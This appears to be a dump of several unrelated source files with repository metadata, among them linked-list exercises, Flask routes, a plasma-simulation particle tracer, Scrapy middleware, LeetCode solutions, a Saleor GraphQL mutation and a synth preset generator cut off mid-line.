llist.insertAfterNode(llist.head.next,"D") print("**********") llist.printllist() print("*************") #llist.delete_node("D") #llist.delete_node_at_pos(1) llist.printllist() llist.length() print("After swappig") llist.swap_nodes("C", "B") llist.printllist() """ #llist.reverse_iterative() #llist.printllist() # # print("After recursive reverse") # llist.recursive_reverse() # llist.printllist() # llist1 = LinkedList() # # llist1.append(1) # llist1.append(3) # llist1.append(5) # llist1.append(7) # # llist2 = LinkedList() # llist2.append(2) # llist2.append(4) # llist2.append(6) # llist2.append(8) # # print(llist1.printllist()) # print(llist2.printllist()) # # llist1.merge_sorted(llist2) # # print(llist1.printllist()) # # llist1 = LinkedList() # # llist1.append(1) # llist1.append(2) # llist1.append(1) # llist1.append(2) # llist1.append(3) # llist1.printllist() # llist1.remove_duplicates() # print("***********") # llist1.printllist() # llist1 = LinkedList() # # llist1.append(1) # llist1.append(2) # llist1.append(3) # llist1.append(4) # llist1.append(5) # llist1.printllist() # print("***********") # llist1.print_nth_from_last(2) # llist1 = LinkedList() # # llist1.append(1) # llist1.append(2) # llist1.append(1) # llist1.append(2) # llist1.append(3) # # print(llist1.count_occurances_iterative(1)) # print(llist1.count_occurances_iterative(2)) # print(llist1.count_occurances_iterative(3)) # print("***********") # # print(llist1.count_occurances_recursive(llist1.head, 1)) # print(llist1.count_occurances_recursive(llist1.head, 2)) # print(llist1.count_occurances_recursive(llist1.head, 3)) # # llist1 = LinkedList() # # llist1.append(1) # llist1.append(2) # llist1.append(3) # llist1.append(4) # llist1.append(5) # llist1.append(6) # # llist1.rotate(4) # llist1.printllist() llist1 = LinkedList() llist1.append(1) llist1.append(2) llist1.append(3) llist1.append(4) llist1.move_tail_to_head() llist1.printllist()
[ "nagireddypadala434@email.com" ]
nagireddypadala434@email.com
f528a850125e7dd3fa24e232122710ac04537d1c
7c4878b4881d79dd4daa3291e9c498e0706a7603
/lessons19/Словари - основы/task2.py
2e30a33d5cfbf90181166d2a86c70b24f321931c
[ "MIT" ]
permissive
zainllw0w/skillbox
4cbdbb44762439c1aa1793a07683d7620500ddd7
896287b6f7f5612cf589094131fd1a12b0b192ba
refs/heads/main
2023-04-27T16:07:16.613359
2021-05-20T14:12:11
2021-05-20T14:12:11
329,755,030
0
0
null
2021-05-20T14:06:42
2021-01-14T23:01:15
Python
UTF-8
Python
false
false
636
py
student_input = input('Введите информацию о студенте через пробел: фамилию, имя студента, город проживания, вуз, в котором он учится, и все его оценки\n').split() student_info = dict() student_info['Фамилия'] = student_input[0] student_info['Имя'] = student_input[1] student_info['Город'] = student_input[2] student_info['Вуз'] = student_input[3] student_info['Оценки'] = [] for i in student_input[4:]: student_info['Оценки'].append(i) for i in student_info: print(i, ':', student_info[i])
[ "77465388+zainllw0w@users.noreply.github.com" ]
77465388+zainllw0w@users.noreply.github.com
68fd3fe6c771bb15adf73caf8b69bb3cfdf15b3b
5e84763c16bd6e6ef06cf7a129bb4bd29dd61ec5
/blimgui/dist/OpenGL/raw/EGL/KHR/cl_event.py
ceb2b4eb41ae154e01ca2b74068ee0e01c4f6f8b
[ "MIT" ]
permissive
juso40/bl2sdk_Mods
8422a37ca9c2c2bbf231a2399cbcb84379b7e848
29f79c41cfb49ea5b1dd1bec559795727e868558
refs/heads/master
2023-08-15T02:28:38.142874
2023-07-22T21:48:01
2023-07-22T21:48:01
188,486,371
42
110
MIT
2022-11-20T09:47:56
2019-05-24T20:55:10
Python
UTF-8
Python
false
false
685
py
'''Autogenerated by xml_generate script, do not edit!''' from OpenGL import platform as _p, arrays # Code generation uses this from OpenGL.raw.EGL import _types as _cs # End users want this... from OpenGL.raw.EGL._types import * from OpenGL.raw.EGL import _errors from OpenGL.constant import Constant as _C import ctypes _EXTENSION_NAME = 'EGL_KHR_cl_event' def _f( function ): return _p.createFunction( function,_p.PLATFORM.EGL,'EGL_KHR_cl_event',error_checker=_errors._error_checker) EGL_CL_EVENT_HANDLE_KHR=_C('EGL_CL_EVENT_HANDLE_KHR',0x309C) EGL_SYNC_CL_EVENT_COMPLETE_KHR=_C('EGL_SYNC_CL_EVENT_COMPLETE_KHR',0x30FF) EGL_SYNC_CL_EVENT_KHR=_C('EGL_SYNC_CL_EVENT_KHR',0x30FE)
[ "justin.sostmann@googlemail.com" ]
justin.sostmann@googlemail.com
711097389ae82580b61b73cfaee9fbcbb2b655c4
e3a24297a28e9fd2e54e82ec15e84cfcf4cd5b9c
/widukind_api/plugins/html_plugin.py
444179f5072b38f971fb7e1688d9fd082a953f0e
[]
no_license
mmalter/widukind-api
13557cdd5a9626d1b753b466fe025a88cbfc0f20
1518f533471da7b108cb37cc95033989bf7d1839
refs/heads/master
2021-01-24T00:09:21.507044
2016-02-18T06:40:00
2016-02-18T06:40:00
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,884
py
from flask import Blueprint, render_template, abort from widukind_api import queries bp = Blueprint('html', __name__) #TODO: error enable False @bp.route('/providers', endpoint="providers") def html_providers(): query = {"enable": True} projection = {"_id": False, "name": True, "slug": True, "enable": True} docs = queries.col_providers().find(query, projection) return render_template("providers.html", providers=docs) @bp.route('/datasets/<provider>', endpoint="datasets-by-provider") @bp.route('/datasets', endpoint="datasets") def html_datasets(provider=None): query_providers = {"enable": True} projection_provider = {"_id": False, "name": True, "slug": True} query_datasets = {"enable": True} projection_datasets = {"_id": False, "name": True, "slug": True, "dataset_code": True, "provider_name": True} if provider: provider_doc = queries.col_providers().find_one({"slug": provider}) query_datasets["provider_name"] = provider_doc["name"] query_providers["name"] = provider_doc["name"] providers = dict([(doc["name"], doc) for doc in queries.col_providers().find(query_providers, projection_provider)]) query_datasets["provider_name"] = {"$in": list(providers.keys())} datasets = queries.col_datasets().find(query_datasets, projection_datasets) docs = {} for dataset in datasets: provider_name = dataset["provider_name"] if not provider_name in docs: docs[provider_name] = {"provider": providers[provider_name], "datasets": []} docs[provider_name]["datasets"].append(dataset) return render_template("datasets.html", docs=docs)
[ "stephane.rault@radicalspam.org" ]
stephane.rault@radicalspam.org
3bf9cbd9b9ff1b4494f7623711e6c15af177a006
0add969034a82912bc6e19abc427abe883ee65bb
/FSSA_response/trace_particle_new.py
9c4deb04f2b387378e23208c7afeffb304127ed8
[]
no_license
Michael-Gong/New_LPI_python_script
eefd162fdbbc3c614c66e2b157ea5296e3bc8492
9de109c6f19aa60bdeaf102e9a1ec0baff5669ad
refs/heads/master
2020-03-28T16:06:09.631550
2020-02-01T08:21:17
2020-02-01T08:21:17
148,659,608
2
0
null
null
null
null
UTF-8
Python
false
false
5,701
py
import sdf #import matplotlib #matplotlib.use('agg') #import matplotlib.pyplot as plt import numpy as np #from numpy import ma #from matplotlib import colors, ticker, cm #from matplotlib.mlab import bivariate_normal #from optparse import OptionParser #import os #from colour import Color ######## Constant defined here ######## pi = 3.1415926535897932384626 q0 = 1.602176565e-19 # C m0 = 9.10938291e-31 # kg v0 = 2.99792458e8 # m/s^2 kb = 1.3806488e-23 # J/K mu0 = 4.0e-7*pi # N/A^2 epsilon0 = 8.8541878176203899e-12 # F/m h_planck = 6.62606957e-34 # J s wavelength= 1.0e-6 frequency = v0*2*pi/wavelength exunit = m0*v0*frequency/q0 bxunit = m0*frequency/q0 denunit = frequency**2*epsilon0*m0/q0**2 #print 'electric field unit: '+str(exunit) #print 'magnetic field unit: '+str(bxunit) #print 'density unit nc: '+str(denunit) font = {'family' : 'monospace', 'color' : 'black', 'weight' : 'normal', 'size' : 20, } from_path='./two/' to_path='./two/' data = sdf.read(from_path+"i_tot0850.sdf",dict=True) grid_x = data['Grid/Particles/subset_only_e/E_1'].data[0]/wavelength grid_y = data['Grid/Particles/subset_only_e/E_1'].data[1]/wavelength #grid_z = data['Grid/Particles/subset_only_e/E_1'].data[2]/wavelength work_x = data['Particles/Time_Integrated_Work_x/subset_only_e/E_1'].data work_y = data['Particles/Time_Integrated_Work_y/subset_only_e/E_1'].data #work_z = data['Particles/Time_Integrated_Work_z/subset_only_e/E_1'].data px = data['Particles/Px/subset_only_e/E_1'].data/(m0*v0) py = data['Particles/Py/subset_only_e/E_1'].data/(m0*v0) #pz = data['Particles/Pz/subset_only_e/E_1'].data/(m0*v0) gg = (px**2+py**2+1)**0.5 part13_id = data['Particles/ID/subset_only_e/E_1'].data #part13_id = part13_id[ (grid_x>11) & (grid_x<41) & (abs(grid_y) < 3.2) ] #part13_id = part13_id[ (abs(grid_y) < 3.2) ] part13_id = part13_id[ (gg > 1200)]# & (abs(work_x) > 5*abs(work_y)) ] print('part13_id size is ',part13_id.size,' max ',np.max(part13_id),' min ',np.min(part13_id)) #data = sdf.read(from_path+"0050.sdf",dict=True) #grid_x = data['Grid/Particles/subset_high_e/electron'].data[0]/wavelength #grid_y = data['Grid/Particles/subset_high_e/electron'].data[1]/wavelength #part00_id = data['Particles/ID/subset_high_e/electron'].data #part00_id = part00_id[ ( grid_x>5 ) ] #part13_id = np.intersect1d(part00_id,part13_id) #print('after intersect 0000.sdf part_id size is ',part13_id.size,' max ',np.max(part13_id),' min ',np.min(part13_id)) ######### Parameter you should set ########### start = 0 # start time stop = 1200 # end time step = 1 # the interval or step # if (os.path.isdir('jpg') == False): # os.mkdir('jpg') ######### Script code drawing figure ################ #for n in range(start,stop+step,step): # #### header data #### # data = sdf.read(from_path+'i_tot'+str(n).zfill(4)+".sdf",dict=True) # header=data['Header'] # time=header['time'] # if ( n==start ): # part_id = data['Particles/ID/subset_only_e/E_1'].data # else: # part_id = np.intersect1d(data['Particles/ID/subset_only_e/E_1'].data, part_id) # print('Particle_ID size is ',part_id.size,' max ',np.max(part_id),' min ',np.min(part_id)) # #part_id = np.intersect1d(part_id,part13_id) part_id = part13_id #print('After intersecting with final.sdf') #print('Particle_ID size is ',part_id.size,' max ',np.max(part_id),' min ',np.min(part_id)) # # ########## Parameter you should set ########### #start = 0 # start time #stop = 465 # end time #step = 1 # the interval or step px_3d = np.zeros([part_id.size,stop-start+1]) py_3d = np.zeros([part_id.size,stop-start+1]) xx_3d = np.zeros([part_id.size,stop-start+1]) yy_3d = np.zeros([part_id.size,stop-start+1]) work_x_3d = np.zeros([part_id.size,stop-start+1]) work_y_3d = np.zeros([part_id.size,stop-start+1]) for n in range(start,stop+step,step): #### header data #### data = sdf.read(from_path+'i_tot'+str(n).zfill(4)+".sdf",dict=True) grid_x = data['Grid/Particles/subset_only_e/E_1'].data[0]/wavelength grid_y = data['Grid/Particles/subset_only_e/E_1'].data[1]/wavelength work_x = data['Particles/Time_Integrated_Work_x/subset_only_e/E_1'].data work_y = data['Particles/Time_Integrated_Work_y/subset_only_e/E_1'].data px = data['Particles/Px/subset_only_e/E_1'].data/(m0*v0) py = data['Particles/Py/subset_only_e/E_1'].data/(m0*v0) temp_id = data['Particles/ID/subset_only_e/E_1'].data # px = px[np.in1d(temp_id,part_id)] # py = py[np.in1d(temp_id,part_id)] # pz = pz[np.in1d(temp_id,part_id)] # grid_x = grid_x[np.in1d(temp_id,part_id)] # grid_y = grid_y[np.in1d(temp_id,part_id)] # grid_z = grid_z[np.in1d(temp_id,part_id)] # work_x = work_x[np.in1d(temp_id,part_id)] # work_y = work_y[np.in1d(temp_id,part_id)] # work_z = work_z[np.in1d(temp_id,part_id)] # # temp_id = temp_id[np.in1d(temp_id,part_id)] for ie in range(part_id.size): px_3d[ie,n-start] = px[temp_id==part_id[ie]] py_3d[ie,n-start] = py[temp_id==part_id[ie]] xx_3d[ie,n-start] = grid_x[temp_id==part_id[ie]] yy_3d[ie,n-start] = grid_y[temp_id==part_id[ie]] work_x_3d[ie,n-start] = work_x[temp_id==part_id[ie]] work_y_3d[ie,n-start] = work_y[temp_id==part_id[ie]] print('finised '+str(round(100.0*(n-start+step)/(stop-start+step),4))+'%') np.save(to_path+'px2d_l',px_3d) np.save(to_path+'py2d_l',py_3d) np.save(to_path+'xx2d_l',xx_3d) np.save(to_path+'yy2d_l',yy_3d) np.save(to_path+'workx2d_l',work_x_3d) np.save(to_path+'worky2d_l',work_y_3d)
[ "noreply@github.com" ]
Michael-Gong.noreply@github.com
b0971028b099b5fd7fb1594bf79e3b29e8aca198
e585c3a61b830d3c24a8cec8343d262c84c724e7
/SomosAgro/src/mobile/user_interface/activities/caracteristicas_publicacion_activity.py
6667b92035a466737d7ff03c30c1bb828a77142c
[]
no_license
Valupiruiz/AutomationPHP
bb0728b2b6508b017c133a7d560a652033adeaf4
9a92634ac9f5b27e46723294f9a4cc83a1f99252
refs/heads/master
2023-01-18T17:27:57.819270
2020-11-27T15:04:49
2020-11-27T15:04:49
310,594,260
0
0
null
null
null
null
UTF-8
Python
false
false
858
py
from src.mobile.user_interface.mother_screen import MotherScreen from src.mobile.user_interface.locators.caracteristicas_publicacion_locators import CaracteristicasPublicacionLocators from src.mobile.user_interface.activities.descripcion_activity import DescripcionActivity class CaracteristicasPublicacionActivity(MotherScreen): def __init__(self, driver): super().__init__(driver) self.__locators = CaracteristicasPublicacionLocators() def seleccionar_dias(self, dias): _locator = self.__locators.CANTIDAD_DIAS_TEMP.format_locator({"cant_dias": str(dias)}) self.t_single_tap(_locator) def get_precio(self): return int(self.find_element(self.__locators.PRECIO_PUBLICACION_VW).text.replace("$", "")) def continuar(self): super().continuar() return DescripcionActivity(self.driver)
[ "tomasmoreira04@gmail.com" ]
tomasmoreira04@gmail.com
644e1e1c5554c3ddecf72791f602993a39e8c6c8
f65fc577e87084dbeb0bf42aed4fd10e37fb46e4
/tapiriik/web/views/__init__.py
20f4f6b5f3556e1b1e1581ebc0f790a70b9e1447
[]
no_license
chemikadze/tapiriik
4637d7deef7fdd0b86cac30e2917ae45824bfee1
ec75f9d691691a66c6b002cabe734fffbf6ce3bf
refs/heads/master
2021-01-17T11:17:20.541665
2014-01-01T19:13:34
2014-01-01T19:13:34
null
0
0
null
null
null
null
UTF-8
Python
false
false
285
py
from .dashboard import * from .diagnostics import * from .auth import * from .account import * from .sync import * from .supported_activities import * from .supported_services import * from .payments import * from .settings import * # why did I do it this way? should make it less bad
[ "cpf@cpfx.ca" ]
cpf@cpfx.ca
23abccf6e279d1b05e90ee110ff1aac079fd41eb
02ce6d29fec0d68ca2a2a778d37d2f2cff1a590e
/Day01-15/code/Day13/multithread1.py
ee8f83985de00593d5b95dfe88aee3e6c7bf0df9
[]
no_license
CalvinCheungCoder/Python-100-Days
605045122e40c119abc32466c32479559a4d4b9b
0f9bec8893954d4afbe2037dad92885c7d4d31f8
refs/heads/master
2020-04-17T11:49:42.148478
2019-09-19T10:22:37
2019-09-19T10:22:37
166,556,771
1
0
null
null
null
null
UTF-8
Python
false
false
1,236
py
# 使用多线程的情况 - 模拟多个下载任务 from random import randint from time import time, sleep import atexit import _thread def download_task(filename): print('开始下载%s...' % filename) time_to_download = randint(5, 10) print('剩余时间%d秒.' % time_to_download) sleep(time_to_download) print('%s下载完成!' % filename) def shutdown_hook(start): end = time() print('总共耗费了%.3f秒.' % (end - start)) def main(): start = time() # 将多个下载任务放到多个线程中执行 thread1 = _thread.start_new_thread(download_task, ('Python从入门到住院.pdf',)) thread2 = _thread.start_new_thread(download_task, ('Peking Hot.avi',)) # 注册关机钩子在程序执行结束前计算执行时间 atexit.register(shutdown_hook, start) if __name__ == '__main__': main() # 执行这里的代码会引发致命错误(不要被这个词吓到) 因为主线程结束后下载线程再想执行就会出问题 # 需要说明一下 由于_thread模块属于比较底层的线程操作而且不支持守护线程的概念 # 在实际开发中会有诸多不便 因此我们推荐使用threading模块提供的高级操作进行多线程编程
[ "984382258@qq.com" ]
984382258@qq.com
6c4f916ab3dde9c3c73afc2ce13730c11e20b449
9703641c14b7c19f2fcf937150204ab85b4151a2
/map_reduce.py
87ecd4b4ecd80fdeefd121254a0c3b40ccc5a51c
[]
no_license
walkmiao/Little_Case
8effbea554c930e0eb32d4335ecbd5541a9c1251
ab445659e19c85ecfd9b99f8d615c33f900662f8
refs/heads/master
2021-06-11T05:30:39.415720
2019-05-14T10:37:29
2019-05-14T10:37:29
128,582,484
1
0
null
null
null
null
UTF-8
Python
false
false
750
py
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 2018/4/14 11:05 # @Author : LCH # @Site : # @File : map_reduce.py # @Software: PyCharm from functools import reduce print('map函数打印'.center(20,'*')) L1=map(lambda x:('整数'+str(x)),[x for x in range(1,10) if (x%2==0)]) for i in L1: print(i) print('reduce 函数打印'.center(20,'*')) L2=reduce(lambda x,y:x*y,[x for x in range (1,10) if (x%2==0)]) print(L2) print('分割线'.center(20,'-')) print('fileter 函数打印'.center(20,'*')) def f(x): if x%2==0: return x L3=filter(lambda x:f(x),[x for x in range(1,10)]) for i in L3: print(i) print('sorted函数打印'.center(20,'*')) L4=sorted([x for x in range(1,10)],key=abs) for i in L4: print(i)
[ "372815340@qq.com" ]
372815340@qq.com
4da87d1a40389b28f78cfe305a3a0639b5b29e12
c4b94158b0ac8f1c4f3d535b6cdee5d1639743ce
/Python/111__Minimum_Depth_of_Binary_Tree.py
6fe7a6cb166e10c97b1bc7263b6fa7b285ff494a
[]
no_license
FIRESTROM/Leetcode
fc61ae5f11f9cb7a118ae7eac292e8b3e5d10e41
801beb43235872b2419a92b11c4eb05f7ea2adab
refs/heads/master
2020-04-04T17:40:59.782318
2019-08-26T18:58:21
2019-08-26T18:58:21
156,130,665
2
0
null
null
null
null
UTF-8
Python
false
false
1,219
py
# Definition for a binary tree node. # class TreeNode(object): # def __init__(self, x): # self.val = x # self.left = None # self.right = None class Solution(object): def minDepth(self, root): """ :type root: TreeNode :rtype: int """ if not root: return 0 else: stack, min_depth = [(1, root)], float("inf") while stack: depth, root = stack.pop() children = [root.left, root.right] if not any(children): min_depth = min(depth, min_depth) for c in children: if c: stack.append((depth + 1, c)) return min_depth # Or Use Recursion class Solution: def minDepth(self, root): """ :type root: TreeNode :rtype: int """ if not root: return 0 children = [root.left, root.right] # if we're at leaf node if not any(children): return 1 min_depth = float("inf") for child in children: if child: min_depth = min(self.minDepth(child), min_depth) return min_depth + 1
[ "junou_cui@berkeley.edu" ]
junou_cui@berkeley.edu
dba2464ce4ec39659e48e36fb8993b924f58f5a4
9851c3f47c1aa165bc0d239074fe238f82055875
/LeetCode/1470. Shuffle the Array/solution.py
d87117a07f282268c856397090c5fbb36069116d
[ "Apache-2.0" ]
permissive
InnoFang/algo-set
12f886dbec0da664327d26bcaf02c1316151a643
2419a7d720bea1fd6ff3b75c38342a0ace18b205
refs/heads/master
2023-03-16T09:51:24.631068
2023-03-13T11:08:54
2023-03-13T11:08:54
86,413,001
23
9
null
null
null
null
UTF-8
Python
false
false
440
py
""" 53 / 53 test cases passed. Runtime: 24 ms Memory Usage: 15.2 MB """ class Solution: def shuffle(self, nums: List[int], n: int) -> List[int]: return [nums[(i >> 1) + n] if i & 1 else nums[(i >> 1)] for i in range(2 * n)] """ 53 / 53 test cases passed. Runtime: 50 ms Memory Usage: 15.1 MB """ class Solution2: def shuffle(self, nums: List[int], n: int) -> List[int]: return sum(zip(nums[:n], nums[n:]), ())
[ "innofang@outlook.com" ]
innofang@outlook.com
ef8b0f71bb72e856120f0380af6305f0cdb7c789
8f8498bb6f56b19d45a1989c8113a077348c0a02
/SWEA/Level 4/격자판의 숫자 이어 붙이기.py
0d5c2c5b5ad7a58fb2d1115a1e87ee2fe8dbf278
[]
no_license
gjtjdtn201/practice
a09b437c892b0b601e156c09cb1f053b52fab11b
ea45582b2773616b2b8f350b927559210009d89f
refs/heads/master
2021-01-01T13:29:46.640740
2020-11-28T00:55:37
2020-11-28T00:55:37
239,299,485
0
1
null
null
null
null
UTF-8
Python
false
false
615
py
import sys sys.stdin = open('격자판에 숫자 이어 붙이기.txt', 'r') def ad(n, al, a, b): if n == 7: visit.add(al) return for i in range(4): ny = a + dy[i] nx = b + dx[i] if 0 <= ny < 4 and 0 <= nx < 4: ad(n+1, al+matrix[ny][nx], ny, nx) dy = [1, -1, 0, 0] dx = [0, 0, 1, -1] for tc in range(1, int(input())+1): matrix = [] for i in range(4): matrix.append(list(input().split())) visit = set() for y in range(4): for x in range(4): ad(1, matrix[y][x], y, x) print('#{} {}'.format(tc, len(visit)))
[ "gjtjdtn201@naver.com" ]
gjtjdtn201@naver.com
2f8935e90b1f58cd08d61595961b2acef65972f0
61b565b8ebc39dd561fee2923b94027efb42b7f6
/agsadmin/sharing_admin/content/users/UserContentBase.py
84ea50006a2e27b2e7ff9bcf689d6f05a0ae99f1
[ "BSD-3-Clause" ]
permissive
DavidWhittingham/agsadmin
30cc8ac9297db1f169aa3f2cf068bbfba77d9b2f
31960c01321df95d5918950371d3d795da2d0579
refs/heads/develop
2023-07-24T02:35:01.492001
2023-07-05T04:24:09
2023-07-05T04:24:09
13,790,963
3
5
BSD-3-Clause
2018-03-06T06:10:19
2013-10-23T01:51:30
Python
UTF-8
Python
false
false
2,470
py
from __future__ import (absolute_import, division, print_function, unicode_literals) from builtins import (ascii, bytes, chr, dict, filter, hex, input, int, map, next, oct, open, pow, range, round, str, super, zip) from ...._utils import send_session_request from ..._PortalEndpointBase import PortalEndpointBase from .AddItemParams import AddItemParams from .ListItemsParams import ListItemsParams from .PublishParams import PublishParams from .UserItem import UserItem class UserContentBase(PortalEndpointBase): def __init__(self, requests_session, url_base, username): super().__init__(requests_session, url_base) self._pdata = {"username": username} @property def _url_full(self): return "{0}/{1}".format(self._url_base, self.username) @property def username(self): return self._pdata["username"] def add_item(self, add_item_params): add_item_params = add_item_params._get_params() if isinstance(add_item_params, AddItemParams) else add_item_params r = self._create_operation_request(self, "addItem", method="POST", data=add_item_params) return send_session_request(self._session, r).json() def get_item(self, item_id): """ Gets a link to a content item in the portal owned by a particular user. """ return UserItem(self._session, self._url_full, self.username, item_id) def list_items(self, list_items_params=None): """ Gets a list of item details. """ list_items_params = None if list_items_params == None else list_items_params._get_params() if isinstance( list_items_params, ListItemsParams) else list_items_params r = self._create_operation_request(self, data=list_items_params) return send_session_request(self._session, r).json() def publish(self, publish_params): publish_params = publish_params._get_params() if isinstance(publish_params, PublishParams) else publish_params r = self._create_operation_request(self, "publish", method="POST", data=publish_params) return send_session_request(self._session, r).json() def replace_service(self, replace_service_request): r = self._create_operation_request(self, "replaceService", method="POST", data=replace_service_request) return send_session_request(self._session, r).json()
[ "DavidWhittingham@users.noreply.github.com" ]
DavidWhittingham@users.noreply.github.com
00899b9182a2710abdfd11fc903f3a4866a2efe0
38d93c5fd72fee380ec431b2ca60a069eef8579d
/Baekjoon,SWEA, etc/백준/4012요리사.py
3dc13f8f65a96aa2d92052c6c5f00e14aa6cf448
[]
no_license
whgusdn321/Competitive-programming
5d1b681f5bee90de5678219d91cd0fa764476ddd
3ff8e6b1d2facd31a8210eddeef851ffd0dce02a
refs/heads/master
2023-01-01T01:34:22.936373
2020-10-24T11:05:08
2020-10-24T11:05:08
299,181,046
0
0
null
null
null
null
UTF-8
Python
false
false
1,090
py
def make_combis(i, stakk, limit): global N, combis if len(stakk) == limit: anothor = [i for i in range(N) if i not in stakk] combis.append([stakk.copy(), anothor]) return for j in range(i+1, N): stakk.append(j) make_combis(j, stakk, limit) stakk.pop() T = int(input()) for tc in range(1, T+1): N = int(input()) maap = [] for _ in range(N): temp = [int(char) for char in input().split()] maap.append(temp) limit = N // 2 combis = [] make_combis(-1, [], limit) #print('combis : ', combis) results = [] for combi in combis: food1, food2 = combi a, b = 0, 0 for i in range(N//2): for j in range(i+1, N//2): a += maap[food1[i]][food1[j]] a += maap[food1[j]][food1[i]] for i in range(N//2): for j in range(i+1, N//2): b += maap[food2[i]][food2[j]] b += maap[food2[j]][food2[i]] results.append(abs(a - b)) print('#{} {}'.format(tc, min(results)))
[ "blackgoldace@naver.com" ]
blackgoldace@naver.com
e73ee26033ad8ab16f6bf631cc3d8896890ebe9b
721b77cd11d74a0bca941d16090e10124d24566a
/marchfelderebank/middlewares.py
ba8f7cb144f48d91bc2a1d1ae500bd557a394bfc
[]
no_license
SimeonYS/Marchfelder-Bank-eG
619195f4769c582c98dd4bf7a3038c0185d3e4f6
80d44f9633a7f4d860eb68ada6a81439a8eb442b
refs/heads/main
2023-03-05T16:48:53.917333
2021-02-17T12:23:20
2021-02-17T12:23:20
339,710,868
0
0
null
null
null
null
UTF-8
Python
false
false
3,668
py
# Define here the models for your spider middleware # # See documentation in: # https://docs.scrapy.org/en/latest/topics/spider-middleware.html from scrapy import signals # useful for handling different item types with a single interface from itemadapter import is_item, ItemAdapter class MarchfelderebankSpiderMiddleware: # Not all methods need to be defined. If a method is not defined, # scrapy acts as if the spider middleware does not modify the # passed objects. @classmethod def from_crawler(cls, crawler): # This method is used by Scrapy to create your spiders. s = cls() crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) return s def process_spider_input(self, response, spider): # Called for each response that goes through the spider # middleware and into the spider. # Should return None or raise an exception. return None def process_spider_output(self, response, result, spider): # Called with the results returned from the Spider, after # it has processed the response. # Must return an iterable of Request, or item objects. for i in result: yield i def process_spider_exception(self, response, exception, spider): # Called when a spider or process_spider_input() method # (from other spider middleware) raises an exception. # Should return either None or an iterable of Request or item objects. pass def process_start_requests(self, start_requests, spider): # Called with the start requests of the spider, and works # similarly to the process_spider_output() method, except # that it doesn’t have a response associated. # Must return only requests (not items). for r in start_requests: yield r def spider_opened(self, spider): spider.logger.info('Spider opened: %s' % spider.name) class MarchfelderebankDownloaderMiddleware: # Not all methods need to be defined. If a method is not defined, # scrapy acts as if the downloader middleware does not modify the # passed objects. @classmethod def from_crawler(cls, crawler): # This method is used by Scrapy to create your spiders. s = cls() crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) return s def process_request(self, request, spider): # Called for each request that goes through the downloader # middleware. # Must either: # - return None: continue processing this request # - or return a Response object # - or return a Request object # - or raise IgnoreRequest: process_exception() methods of # installed downloader middleware will be called return None def process_response(self, request, response, spider): # Called with the response returned from the downloader. # Must either; # - return a Response object # - return a Request object # - or raise IgnoreRequest return response def process_exception(self, request, exception, spider): # Called when a download handler or a process_request() # (from other downloader middleware) raises an exception. # Must either: # - return None: continue processing this exception # - return a Response object: stops process_exception() chain # - return a Request object: stops process_exception() chain pass def spider_opened(self, spider): spider.logger.info('Spider opened: %s' % spider.name)
[ "simeon.simeonov@ADPVT.com" ]
simeon.simeonov@ADPVT.com
60ab1489088b31707cfd6d1c0b22af2b86e2e4dd
84c4474a88a59da1e72d86b33b5326003f578271
/saleor/graphql/menu/mutations/menu_update.py
cc4bee256c0cd0517f1ae8a880c5c915fb1e9b1d
[ "BSD-3-Clause" ]
permissive
vineetb/saleor
052bd416d067699db774f06453d942cb36c5a4b7
b0d5ec1a55f2ceeba6f62cf15f53faea0adf93f9
refs/heads/main
2023-07-20T02:01:28.338748
2023-07-17T06:05:36
2023-07-17T06:05:36
309,911,573
0
0
NOASSERTION
2020-11-04T06:32:55
2020-11-04T06:32:55
null
UTF-8
Python
false
false
1,689
py
import graphene from ....menu import models from ....permission.enums import MenuPermissions from ....webhook.event_types import WebhookEventAsyncType from ...channel import ChannelContext from ...core import ResolveInfo from ...core.mutations import ModelMutation from ...core.types import MenuError from ...core.utils import WebhookEventInfo from ...plugins.dataloaders import get_plugin_manager_promise from ..types import Menu class MenuInput(graphene.InputObjectType): name = graphene.String(description="Name of the menu.") slug = graphene.String(description="Slug of the menu.", required=False) class MenuUpdate(ModelMutation): class Arguments: id = graphene.ID(required=True, description="ID of a menu to update.") input = MenuInput( required=True, description="Fields required to update a menu." ) class Meta: description = "Updates a menu." model = models.Menu object_type = Menu permissions = (MenuPermissions.MANAGE_MENUS,) error_type_class = MenuError error_type_field = "menu_errors" webhook_events_info = [ WebhookEventInfo( type=WebhookEventAsyncType.MENU_UPDATED, description="A menu was updated.", ), ] @classmethod def post_save_action(cls, info: ResolveInfo, instance, cleaned_input): manager = get_plugin_manager_promise(info.context).get() cls.call_event(manager.menu_updated, instance) @classmethod def success_response(cls, instance): instance = ChannelContext(node=instance, channel_slug=None) return super().success_response(instance)
[ "noreply@github.com" ]
vineetb.noreply@github.com
e58a210e35b00d7436f86b19cc0b7f3004ea0685
ba095b34fb62cff6f5f6f32dc7036f13b45681a2
/llia/synths/chronos/chronos_random.py
9efb38afa7d9ca00ff2c6f8f8e3e8c2ecd0c355e
[]
no_license
plewto/Llia
7d3c60bd7355d02e9b00e97c82f24da5fa83b0f4
97f530ff0841b9604f0d9575e7e1f0e3c0660be0
refs/heads/master
2020-05-21T20:39:07.223990
2018-04-30T02:28:55
2018-04-30T02:28:55
63,315,753
17
2
null
2016-08-04T17:10:17
2016-07-14T08:05:33
Python
UTF-8
Python
false
false
1,563
py
# llia.synths.chronos.chronos_random from llia.util.lmath import * from llia.synths.chronos.chronos_data import chronos def random_program(slot=127, *_): p = chronos(slot, "Random", lfoCommonFreq = coin(0.75, rnd(3),rnd(10)), d1Dry1In = 1.0, d1Dry2In = 0.0, d1DelayTime = coin(0.5, rnd(2), coin(0.5, rnd(0.2), rnd(0.01))), d1LfoRatio = pick([0.125,0.25,0.5,0.75,1.0,1.5,2,3,4,5,6,8]), d1ExternalModDepth = 0.0, d1Lowpass = coin(0.75, 20000, pick([1000,2000,4000,8000])), d1Highpass = coin(0.75, 40, pick([200,400,800,1600,3200])), d1Feedback = coin(0.75, rnd(0.75), rnd()), d2Dry1In = 0.0, d2Dry2In = 1.0, d2Delay1In = coin(0.75, 0.0, 1.0), d2DelayTime = coin(0.5, rnd(2), coin(0.5, rnd(0.2), rnd(0.01))), d2LfoRatio = pick([0.125,0.25,0.5,0.75,1.0,1.5,2,3,4,5,6,8]), d2ExternalModDepth = 0.0, d2Lowpass = coin(0.75, 20000, pick([1000,2000,4000,8000])), d2Highpass = coin(0.75, 40, pick([200,400,800,1600,3200])), d2Feedback = coin(0.75, rnd(0.75), rnd()), dry1Amp = 1.0, dry2Amp 